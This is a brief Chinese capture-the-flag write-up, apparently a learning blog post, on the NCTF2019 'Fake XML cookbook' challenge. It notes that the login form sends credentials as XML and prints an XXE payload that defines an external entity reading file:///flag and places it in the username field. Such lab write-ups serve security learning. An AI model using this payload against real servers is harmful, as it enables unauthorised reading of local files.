[NCTF2019]Fake XML cookbook(学习)
首页长这样
有几行js,大意是将用户名和密码通过xml传输
瞎输一通出发了报错,好像可以对发送的xml进行注入
这玩意没咋了解过,就当是学习XXE了叭QAQ
<?xml version="1.0"?>
<!DOCTYPE xxe [
<!ENTITY flag SYSTEM "file:///flag">
]>
<user>
<username>&flag;</username>
<password>123</password>
</user>
